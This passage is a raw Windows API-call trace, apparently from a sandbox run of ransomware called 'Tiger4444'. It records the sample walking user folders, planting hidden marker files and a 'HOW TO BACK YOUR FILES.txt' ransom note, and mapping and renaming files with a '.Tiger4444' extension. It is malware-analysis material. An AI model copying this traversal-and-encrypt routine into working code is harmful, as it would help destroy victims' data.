lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.299] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.301] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.302] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.302] CloseHandle (hObject=0x2ac) returned 1 [0052.303] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files") returned 54 [0052.303] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.303] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0x843070bf, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73208 [0052.303] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.304] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.304] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.304] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.304] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0x843070bf, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.304] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.304] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.304] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.304] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.304] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.304] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x843070bf, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x843070bf, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x843070bf, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.304] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.304] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.304] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe2954bc8, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UserLexicons", cAlternateFileName="USERLE~1")) returned 1 [0052.304] lstrcmpiW (lpString1="UserLexicons", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.304] lstrcmpiW (lpString1="UserLexicons", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.304] lstrcmpiW (lpString1="UserLexicons", lpString2="Tiger4444.exe") returned 1 [0052.304] lstrcmpiW (lpString1="UserLexicons", lpString2=".") returned 1 [0052.304] lstrcmpiW (lpString1="UserLexicons", lpString2="..") returned 1 [0052.304] lstrcmpiW (lpString1="UserLexicons", lpString2="windows") returned -1 [0052.304] lstrcmpiW (lpString1="UserLexicons", lpString2="bootmgr") returned 1 [0052.304] lstrcmpiW (lpString1="UserLexicons", lpString2="pagefile.sys") returned 1 [0052.304] lstrcmpiW (lpString1="UserLexicons", lpString2="boot") returned 1 [0052.304] lstrcmpiW (lpString1="UserLexicons", lpString2="ids.txt") returned 1 [0052.304] lstrcmpiW (lpString1="UserLexicons", lpString2="NTUSER.DAT") returned 1 [0052.304] lstrcpyW (in: lpString1=0x30aeb16, lpString2="UserLexicons" | out: lpString1="UserLexicons") returned="UserLexicons" [0052.304] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91408 [0052.304] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x88) returned 0xc78ce8 [0052.305] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91410 | out: ListHead=0xc66828, ListEntry=0xc91410) returned 0xc91490 [0052.305] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe2954bc8, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UserLexicons", cAlternateFileName="USERLE~1")) returned 0 [0052.305] FindClose (in: hFindFile=0xc73208 | out: hFindFile=0xc73208) returned 1 [0052.305] lstrcpyW (in: lpString1=0x30aeb16, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.305] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\files\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.306] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.307] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.307] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.307] CloseHandle (hObject=0x2c8) returned 1 [0052.307] CloseHandle (hObject=0x2ac) returned 1 [0052.307] GetCurrentThreadId () returned 0xfa8 [0052.307] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91410 [0052.307] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons" [0052.307] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78ce8 | out: hHeap=0xc50000) returned 1 [0052.307] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91408 | out: hHeap=0xc50000) returned 1 [0052.307] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons" [0052.307] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\" [0052.307] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\.BFC0E91B00AE8A0620D3" [0052.307] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\files\\userlexicons\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.309] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.312] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.313] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.313] CloseHandle (hObject=0x2ac) returned 1 [0052.313] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons") returned 67 [0052.313] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.313] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0x8432d205, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f88 [0052.313] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.313] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.313] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.314] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.314] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0x8432d205, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.314] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.314] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.314] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.314] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.314] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.314] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8432d205, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8432d205, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8432d205, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.314] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.314] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.314] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe2954bc8, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0x3ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SP_31FD1255772945E99CBED4370F39872D.dat", cAlternateFileName="SP_31F~1.DAT")) returned 1 [0052.314] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.314] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.314] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="Tiger4444.exe") returned -1 [0052.314] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2=".") returned 1 [0052.314] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="..") returned 1 [0052.314] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="windows") returned -1 [0052.314] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="bootmgr") returned 1 [0052.314] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="pagefile.sys") returned 1 [0052.314] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="boot") returned 1 [0052.314] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="ids.txt") returned 1 [0052.314] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="NTUSER.DAT") returned 1 [0052.314] lstrcpyW (in: lpString1=0x30aeb30, lpString2="SP_31FD1255772945E99CBED4370F39872D.dat" | out: lpString1="SP_31FD1255772945E99CBED4370F39872D.dat") returned="SP_31FD1255772945E99CBED4370F39872D.dat" [0052.314] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\SP_31FD1255772945E99CBED4370F39872D.dat", dwFileAttributes=0x0) returned 1 [0052.315] lstrlenW (lpString="SP_31FD1255772945E99CBED4370F39872D.dat") returned 39 [0052.315] lstrlenW (lpString="Tiger4444") returned 9 [0052.315] lstrcmpiW (lpString1="9872D.dat", lpString2="Tiger4444") returned -1 [0052.315] lstrlenW (lpString=".dll") returned 4 [0052.315] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0052.315] lstrlenW (lpString=".lnk") returned 4 [0052.315] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0052.315] lstrlenW (lpString=".ini") returned 4 [0052.315] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0052.315] lstrlenW (lpString=".sys") returned 4 [0052.315] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0052.315] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\SP_31FD1255772945E99CBED4370F39872D.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\files\\userlexicons\\sp_31fd1255772945e99cbed4370f39872d.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.315] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.315] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14376857718) returned 1 [0052.316] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=940) returned 1 [0052.316] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0052.316] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71950 [0052.316] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x2a4 [0052.316] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0xbe0000 [0052.326] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.326] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0052.326] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.326] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0052.326] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.326] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0052.326] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.326] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0052.326] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14377949496) returned 1 [0052.326] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0052.326] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71950 | out: hHeap=0xc50000) returned 1 [0052.326] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.327] CloseHandle (hObject=0x2a4) returned 1 [0052.327] CloseHandle (hObject=0x2c8) returned 1 [0052.327] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\SP_31FD1255772945E99CBED4370F39872D.dat.Tiger4444") returned 117 [0052.327] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\SP_31FD1255772945E99CBED4370F39872D.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\files\\userlexicons\\sp_31fd1255772945e99cbed4370f39872d.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\SP_31FD1255772945E99CBED4370F39872D.dat.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\files\\userlexicons\\sp_31fd1255772945e99cbed4370f39872d.dat.tiger4444"), dwFlags=0x1) returned 1 [0052.327] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe2954bc8, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0x3ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SP_31FD1255772945E99CBED4370F39872D.dat", cAlternateFileName="SP_31F~1.DAT")) returned 0 [0052.327] FindClose (in: hFindFile=0xc72f88 | out: hFindFile=0xc72f88) returned 1 [0052.327] lstrcpyW (in: lpString1=0x30aeb30, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.327] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\files\\userlexicons\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.329] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.329] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.329] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.329] CloseHandle (hObject=0x2c8) returned 1 [0052.329] CloseHandle (hObject=0x2ac) returned 1 [0052.329] GetCurrentThreadId () returned 0xfa8 [0052.329] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91490 [0052.329] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures" [0052.329] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0052.329] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91488 | out: hHeap=0xc50000) returned 1 [0052.330] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures" [0052.330] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\" [0052.330] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\.BFC0E91B00AE8A0620D3" [0052.330] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\signatures\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.330] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.333] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.334] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.334] CloseHandle (hObject=0x2ac) returned 1 [0052.334] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures") returned 52 [0052.334] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.334] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd38fae20, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xd38fae20, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x843534b1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72fc8 [0052.335] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.335] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.335] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.335] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.335] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd38fae20, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xd38fae20, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x843534b1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.335] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.335] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.335] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.335] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.335] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.335] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x843534b1, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x843534b1, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x843534b1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, 